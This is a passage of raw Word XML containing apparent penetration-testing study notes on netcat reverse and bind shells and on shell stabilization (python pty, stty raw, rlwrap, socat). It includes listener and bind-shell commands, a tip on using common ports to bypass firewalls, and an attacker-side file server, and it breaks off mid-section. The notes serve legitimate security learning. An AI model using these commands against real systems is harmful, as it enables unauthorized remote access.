    <w:p w14:paraId="1B2C6D91" w14:textId="4924CE8B" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="005A1990" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reverse Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241483D0" w14:textId="2885D6E4" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="005A1990" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">syntax for listener – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;port number&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3191B99A" w14:textId="1B255FC6" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="005A1990" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-l – listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5935D693" w14:textId="74A1FCC6" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="005A1990" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-v – verbose output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B1EA9" w14:textId="532C4CD4" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="005A1990" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-n – tells netcat not to resolve host names or use DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C3F33" w14:textId="065C7EE1" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="005A1990" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-p – port specification to follow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257C32B7" w14:textId="421A647C" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="005A1990" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>best to use port number under 1024, and a well-known one such as 80, 443, 53, to bypass firewalls – will require sudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1889FD7C" w14:textId="2A72F686" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="005A1990" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bind Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17684062" w14:textId="5DC834C3" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="005A1990" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>if looking to obtain a shell on a target then can assume there is already a listener waiting on a chosen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649CF793" w14:textId="3CD4FA79" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="005A1990" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">syntax – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt; &lt;chosen port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5199BF56" w14:textId="2C449F04" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="005A1990" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Netcat Shell Stabilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F194D9" w14:textId="414F74ED" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="005A1990" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Technique 1 – Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1E2648" w14:textId="16483DE2" w:rsidR="005A1990" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">python -c ‘import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pty;pty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7AC66A" w14:textId="74C93016" w:rsidR="00EA7466" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>use python to spawn a better featured bash shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546BCDE" w14:textId="38DE12D8" w:rsidR="00EA7466" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>some targets may need version of python specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85C229" w14:textId="66021830" w:rsidR="00EA7466" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>export TERM=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>xterm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7966DE3F" w14:textId="62DACD7E" w:rsidR="00EA7466" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>will give access to term commands such as clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A4F5C" w14:textId="3F6FCFB9" w:rsidR="00EA7466" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CTRL+Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F80BF01" w14:textId="4B57F13C" w:rsidR="00EA7466" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">in own terminal – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>stty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> raw -echo; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>fg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07CE7220" w14:textId="0F6C3A0A" w:rsidR="00EA7466" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">turns off terminal echo (gives access to tab autocompletes, arrow keys, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ctrl+C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to kill processes, not the whole shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FB3945" w14:textId="40D0323C" w:rsidR="00EA7466" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>then foregrounds shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2403D0" w14:textId="13135892" w:rsidR="00EA7466" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>if shell dies, input into own terminal will not be visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68398A1D" w14:textId="1A8395FD" w:rsidR="00EA7466" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>fix with reset &gt; ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451DC80D" w14:textId="182080DC" w:rsidR="00EA7466" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Technique 2 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rlwrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47DD02D0" w14:textId="48A07DC9" w:rsidR="00EA7466" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>gives access to history, tab autocomplete, and arrow keys immediately upon receiving a shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50067258" w14:textId="5C521746" w:rsidR="00EA7466" w:rsidRPr="0084205E" w:rsidRDefault="00EA7466" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">some manual stabilization must still be utilized to be able to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ctrl</w:t>
      </w:r>
      <w:r w:rsidR="008125C6" w:rsidRPr="0084205E">
        <w:t>+C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5453C0BB" w14:textId="4B0C1E42" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>not installed by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF1AA43" w14:textId="5448AE29" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">sudo apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rlwrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="034E2E4B" w14:textId="7FF1D8CF" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>to invoke</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C176951" w14:textId="118CE775" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rlwrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65982CF9" w14:textId="25F347CC" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>this method is useful for dealing with Windows shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0116274B" w14:textId="31318CD2" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, stabilize with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F41DCB" w14:textId="7640AF1C" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">background shell, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>stty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>raw -echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>fg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A8ACEF7" w14:textId="10C530DA" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Technique 3 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DBAC493" w14:textId="0540954B" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">use an initial netcat shell as a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>stepping stone</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> into a more fully-featured </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AC061C" w14:textId="4E974DC2" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">limited to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8EE432" w14:textId="0B5E7928" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">first transfer to a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> static compiled binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425AB47F" w14:textId="5BCFD227" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">sudo python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 80 – on attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBE18DB" w14:textId="4964C754" w:rsidR="008125C6" w:rsidRPr="0084205E" w:rsidRDefault="008125C6" w:rsidP="0084205E">
